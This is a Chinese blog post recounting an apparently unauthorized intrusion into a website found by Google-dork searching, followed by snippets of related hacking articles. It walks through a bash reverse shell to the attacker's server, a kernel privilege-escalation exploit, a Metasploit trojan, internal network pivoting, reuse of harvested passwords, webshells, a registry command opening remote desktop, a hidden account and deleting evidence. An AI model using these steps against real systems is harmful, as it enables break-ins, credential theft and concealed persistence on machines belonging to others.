记一次渗透测试实战记录

VSole2022-09-14 06:53:20

0x01 突破边界拿下shell

周末在家闲着没事突然就想搞事情了,然后使用Google hack语法输入批量搜索可能存在上传点的网站,试了好几个最后找到一个可利用的上传点。

inurl:xxx.xxx.xxx/upload

注:涉及敏感信息,图片仅供参考,具体内容自行填充。

0x02 反弹shell&提权

Linux下需要把shell反弹出来以方便我们操作,但是目标主机上既没有nc也没有python,查询相关资料后尝试了一下利用bash弹shell。

需要一台公网服务器,使用命令bash -i >& /dev/tcp/your ip/1234 0>&1,公网服务器使用命令nc -lvp 1234监听1234端口。

现在shell已经反弹出来了,使用id命令查看当前权限,发现仅为Apache,使用-uname -a 查看内核版本,发现服务器内核版本为2.6.31.5-127.fc12.1686。

在exploit-db中搜索此版本的相关漏洞,经过多次尝试,发现了下面这个exp来提升权限。

Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation

然而问题又来了,目标主机上没有gcc,怎么办?只能撞撞运气尝试在本地编译好,再传到目标主机上去执行。

本地编译好exp后传到目标主机TMP路径下,执行命令 chmod 777 a 赋予exp执行权限,然后执行 ./a 获取到root权限。

0x03 横向渗透撸内网

发现目标主机有内网环境,个人比较喜欢用msf,于是生成了个msf木马上传执行获取到一个meterpreter shell。

这里需要注意的是生成木马时LHOST填你的服务器公网ip,设置msf监听时LHOST需要填你服务器的内网ip。

meterpreter shell执行run autoroute -s 10.1.1.0/24添加路由扫内网445,发现一台内网机器存在ms17010,但是session弹不回来,尴尬。

变换思路在边界服务器上寻找有价值的可利用信息,最后发现了几个password.txt和一个批量更新密码的脚本,找到一个长得像管理员的密码,这里不得不说一下在内网渗透中信息收集的重要性,这个密码简直太给力了。

因为是内网,所以得用代理工具把本机代理进去,这里我用的是reGeorg-master,上传tunnel.nosocket.php到网站目录下,配合Proxifier进行全局代理(Linux下用proxychains)。用这个密码登录上了受害主机的ssh,ssh都拿到了,接下来把该删掉的东西都删掉。

扫描内网机器10.1.1.17发现开了ftp,用上面那个密码登录进去了,就是这么巧。然后ftp传马,先传了一个大马。结果发现PHP版本太老了,然后上了个小马,菜刀连接,直接system权限。

发现没开3389,使用命令

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

一键开启远程桌面,建立隐藏账户,成功连入远程桌面。

0x04 写在后面的话

第一次从外网渗透到内网,盯了三天终于撸下一台,感觉这个内网还有的撸,有时间再继续搞。

shell渗透测试
本作品采用《CC 协议》,转载必须注明作者和本文链接
看来这是他的个人博客,检测到浓度看了看用的是世界上最安全的wordpress,看来这站不好拿啊,一般wordpress的前台没啥问题,但是如果登陆到管理员后台基本上就寄了。接着翻了一下数据库,发现有一个wp_usermeta的表很特殊,我怀疑这是不是分配用户权限的地方很快一个地方就引起了我的注意本文盲去查了一下,发现是 帕瓦?
因是内部系统,所以打码稍微严重些。我看了登录框,没验证码,首先想到的肯定是对admin账号先爆破一波。.那接下来就一切顺利了,修改了admin密码,并成功登陆,看到了所有分公司的数据。。。。。。。设计者这就应该挨板子了,再然后才有越权访问admin信息,再有原密码的绕过,这一系列小漏洞单独来说不严重,但一旦结合起来,就出现了很严重的安全事件,在进行安全防护工作时,应尽量考虑周全,任何一个弱点都可能成为黑客的突破口。
本文记录了从一次未授权的访问到获取系统shell渗透测试过程,文中主要阐述了攻击方法、漏洞成因以及防御思路。在进行攻防过程阶段,最重要的工作莫过于信息收集,本文不想记录对信息收集中的数据反复甄别的过程,而是想对一次重大的发现进行过程记录,通过对收集的数据进行反复的筛选发现了2375端口,相信很多在做云原生或者做容器化部署的朋友,应该对这个端口不陌生,没错这个就是docker swarm。从官方的
0x01 起源某天比较无聊,听一个朋友推荐httpscan这款工具,于是就下载下来试试。首先对某学校网段开始进行测试测试时发现有个比较特殊的标题,一般有这个,证明存在目录遍历。这个就又比较开心,看到了phpinfo,这个文件和目录遍历漏洞性质也差不多,说大也大,说小也小。phpinfo属于处在信息收集阶段的一个重头,当有了这些信息,可以看出服务器端调用了那些库,以及一些敏感路径,从而进行深入的漏洞挖掘,用途也是很广的。
0x02 内网怎么会有这么多WEB服务?进,可以用各种姿势getshell甚至直接执行命令;退,即使不能getshell,通过寻找各种信息,也通常可以拿下其它系统,或者是直接用于钓鱼。这里有个WP,那先看看WP用户信息。root@localhost的密码,和上面找到的root_lcy密码一样,都查不出来,推测这个就是这位邻居的常用密码了。OK,内网这部分算是打完了。
本实验环境靶场以发出,从外到内,给你服务器干翻!
0x01 突破边界拿下shell周末在家闲着没事突然就想搞事情了,然后使用Google hack语法输入批量搜索可能存在上传点的网站,试了好几个最后找到一个可利用的上传点。反弹shell&提权Linux下需要把shell反弹出来以方便我们操作,但是目标主机上既没有nc也没有python,查询相关资料后尝试了一下利用bash弹shell。在exploit-db中搜索此版本的相关漏洞,经过多次尝试,发现了下面这个exp来提升权限。一键开启远程桌面,建立隐藏账户,成功连入远程桌面。
渗透测试辅助工具箱
2023-05-12 14:08:08
删除记录:删除指定id主页面MSF页面正则表达式页面小工具页面0x03 免责声明本工具仅能在取得足够合法授权的企业安全建设中使用,在使用本工具过程中,您应确保自己所有行为符合当地的法律法规。该工具仅用于学习交流,如您在使用本工具的过程中存在任何非法行为,您将自行承担所有后果,本工具所有开发者和本公众号不承担任何法律及连带责任。
0X1 BerylEnigma介绍一个CTF+渗透测试工具包,主要实现一些常用的加密与编码功能,前身为CryptionTool,为更方便的开发更换框架重构。软件基于JDK17开发,使用JAVAFX UI框架以及JFoenixUI组件架构。0X2 BerylEnigma功能现代古典红队操作工具文本操作工具HTLM-hashROT13目标整理文本替换JWT栅栏密码域名分割文本分隔认证Atbash回弹shell生成英文大小写转换hashVigenre文本行拼接SM3凯撒密码编码待办清单URL编码 - Base64编码增强ASCII图像工具 - 二维码Base64现代加密 - AES,DESBrainFuck现代加密 -?
由于低权限用户无法执行太多操作,可以利用反弹上传Churrasco.exe,后续可以利用它来做提权。输入net user指令查看是否添加成功,最后提权成功。linux系统提权思路linux基础信息收集uname -a 显示全部系统信息cat /etc/issue 内核信息。
VSole
网络安全专家